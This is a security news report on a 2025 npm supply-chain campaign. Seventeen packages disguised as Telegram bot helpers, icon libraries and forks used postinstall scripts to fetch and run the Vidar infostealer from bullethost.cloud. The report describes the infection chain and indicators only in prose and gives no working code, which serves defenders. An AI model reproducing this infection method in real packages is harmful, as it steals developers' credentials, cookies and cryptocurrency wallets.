Emergence of a Sophisticated Supply-Chain Attack
A sophisticated supply-chain offensive has surfaced, specifically targeting Windows systems via compromised npm packages—a notable vulnerability within the realm of open-source software dissemination.
Between October 21 and 26, 2025, threat actors disseminated 17 malicious npm packages encompassing 23 distinct releases engineered to propagate Vidar infostealer malware.
This campaign capitalized on the inherent trust developers place in package registries, cleverly masquerading as benign packages, including Telegram bot helpers, icon libraries, and forks of well-known projects such as Cursor and React.
The attack was conducted through two newly established npm accounts, aartje and saliii229911, which published packages that were downloaded more than 2,240 times prior to their removal from the registry.
This distribution technique signifies a transformative approach for Vidar, which has historically been disseminated via phishing emails with malicious Office documents.
The duplicitous packaging and ostensibly legitimate functionalities facilitated the widespread propagation of malicious code before timely detection could occur. The package custom-tg-bot-plan presents as a legitimate SDK on its npm page.
Security researchers at Datadog Security Labs identified the campaign through their GuardDog static analyzer, which flagged numerous suspicious indicators, including post-install script execution and process spawning activities.
This investigation revealed that all packages executed identical attack chains via postinstall scripts; certain variants employed PowerShell commands embedded directly within package.json files.
Infection Mechanism and Technical Breakdown
The attack exhibits a remarkable simplicity in its execution. Upon installation of the compromised packages, post-installation scripts were automatically triggered, downloading an encrypted ZIP archive from the bullethost.cloud infrastructure.
Downloader scripts utilized hardcoded credentials to extract the archive, appropriating bridle.exe, a previously unseen Go-compiled variant of Vidar within npm distributions.
Once executed with system privileges, the malware initiated its data exfiltration process.
This Vidar variant is adept at gathering sensitive information, including browser credentials, cookies, cryptocurrency wallets, and system files, subsequently exfiltrating the pilfered data through command-and-control (C2) channels.
The malware identifies active C2 servers by probing hardcoded Telegram and Steam throwaway accounts that house regularly updated C2 domains.
Subsequent to successful data exfiltration, the malware meticulously purges traces of its activities, complicating post-compromise detection efforts.
This campaign exemplifies a sophisticated understanding of vulnerabilities inherent in the npm ecosystem.
Threat actors oscillated between multiple C2 domains and employed variations in post-install script implementations, presumably to obscure detection by pattern-based systems.
All affected packages remained operational on npm for roughly two weeks, marking this as one of the most significant npm-based malware campaigns targeting both enterprise development environments and individual developers globally.
Source link: Cybersecuritynews.com.
